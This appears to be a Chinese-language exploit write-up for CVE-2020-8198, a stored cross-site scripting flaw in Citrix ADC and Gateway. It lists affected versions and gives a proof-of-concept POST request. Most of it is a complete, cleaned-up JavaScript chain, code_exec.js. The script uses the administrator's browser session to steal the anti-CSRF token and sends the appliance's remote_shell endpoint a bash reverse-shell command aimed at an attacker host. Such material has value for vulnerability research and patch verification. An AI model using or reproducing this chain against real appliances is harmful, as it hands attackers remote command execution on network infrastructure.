(CVE-2020-8198)Citrix_储存型xss

# (CVE-2020-8198)Citrix 储存型xss

=================================

一、漏洞简介
————

前提条件：受害者需以 NSIP 管理员（nsroot）身份登录。这是储存型 XSS：注入的脚本会在受害者浏览器中、带着其已认证的管理员会话执行，下文的 code_exec.js 正是借助这一会话向 /rapi/remote_shell 发送命令执行请求。

二、漏洞影响
————

Citrix ADC and Citrix Gateway: < 13.0-58.30
Citrix ADC and NetScaler Gateway: < 12.1-57.18
Citrix ADC and NetScaler Gateway: < 12.0-63.21
Citrix ADC and NetScaler Gateway: < 11.1-64.14
NetScaler ADC and NetScaler Gateway: < 10.5-70.18
Citrix SD-WAN WANOP: < 11.1.1a
Citrix SD-WAN WANOP: < 11.0.3d
Citrix SD-WAN WANOP: < 10.2.7
Citrix Gateway Plug-in for Linux: < 1.0.0.137

三、复现过程
————

PoC 请求如下：

```http
POST /menu/stapp HTTP/1.1
Host: www.0-sec.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 96
Content-Type: application/x-www-form-urlencoded
X-NITRO-USER: henk

sid=254&pe=1,2,3,4,5&appname=%0a&au=1&username=nsroot
```

注意：示例中的 `Content-Length: 96` 与所示请求体（53 字节）并不一致，实际发送时应按真实请求体长度重新计算（Burp 等工具会自动更新该头）。

### 深入利用

> csrf.html

（csrf.html 的内容在本页未保留。）










> code_exec.js

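/**
 * Fetch `url` with a same-origin GET (so the victim's session cookies are
 * attached), run `callback` on the response text to extract the per-session
 * `rand` token, and hand that token to `exec_command`.
 *
 * @param {string} url  Path of the page that embeds `var rand = "..."`.
 * @param {function(string): (string|undefined)} callback  Token extractor
 *   (see `get_rand`); must return undefined when no token is present.
 */
function load(url, callback) {
  const xhr = new XMLHttpRequest();

  xhr.onreadystatechange = () => {
    if (xhr.readyState !== 4) {
      return;
    }
    // Without this guard a missing token would be sent as the literal
    // string "undefined" in the rand_key header.
    const rand = callback(xhr.response);
    if (rand === undefined) {
      console.error('load: no rand token found in ' + url);
      return;
    }
    exec_command(rand);
  };

  xhr.open('GET', url, true);
  xhr.send('');
}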

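/**
 * Pull the anti-CSRF token out of a page that embeds it as `var rand = "...";`.
 *
 * @param {string} payload  Raw HTML/JS text of the page (e.g. /menu/stc).
 * @returns {string|undefined}  The token, or undefined if no such line exists.
 */
function get_rand(payload) {
  const marker = 'var rand = "';
  for (const line of payload.split('\n')) {
    if (line.includes(marker)) {
      // The token is the first double-quoted string on that line.
      return line.split('"')[1];
    }
  }
  return undefined;
}

/**
 * POST a shell command to the appliance's /rapi/remote_shell endpoint, which
 * expects a `rand_key` header plus a form field `object` holding JSON.
 * Because this runs in the victim's browser, the request carries their
 * authenticated session; the reply's `remote_shell.output` is shown via alert.
 *
 * @param {string} rand  Token obtained via `get_rand`.
 */
function exec_command(rand) {
  // Declared locally on purpose: the original assigned a bare `url`, which
  // silently overwrote the top-level `url` variable.
  const url = '/rapi/remote_shell';
  // Reverse shell to the attacker host; `你的服务器` is a placeholder for it.
  // `&` is written literally here because the form body is percent-encoded
  // below (the original hand-encoded it as %26 and sent the JSON raw).
  const command = 'bash -c "bash -i >& /dev/tcp/你的服务器/16588 0>&1"';

  const obj = {
    params: {
      warning: 'YES',
    },
    remote_shell: {
      command,
      prompt: '>',
      target: 'shell',
      suppress: 0,
      execute_in_partition: '',
    },
  };

  const xhr = new XMLHttpRequest();

  xhr.onreadystatechange = () => {
    if (xhr.readyState !== 4) {
      return;
    }
    let response;
    try {
      response = JSON.parse(xhr.response);
    } catch (err) {
      // A login page or error page comes back as HTML, not JSON.
      console.error('exec_command: non-JSON reply from ' + url, err);
      return;
    }
    alert(response.remote_shell.output);
  };

  xhr.open('POST', url, true);
  xhr.setRequestHeader('rand_key', rand);
  xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
  // Encode the single `object` field so `&`, `+` and `%` inside the JSON
  // cannot split or corrupt the form body.
  xhr.send('object=' + encodeURIComponent(JSON.stringify(obj)));
}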

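// Entry point: fetch the page that embeds the rand token, extract it with
// get_rand, and fire the command through exec_command (via load's callback).
const tokenPageUrl = '/menu/stc';
load(tokenPageUrl, get_rand);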

1.png
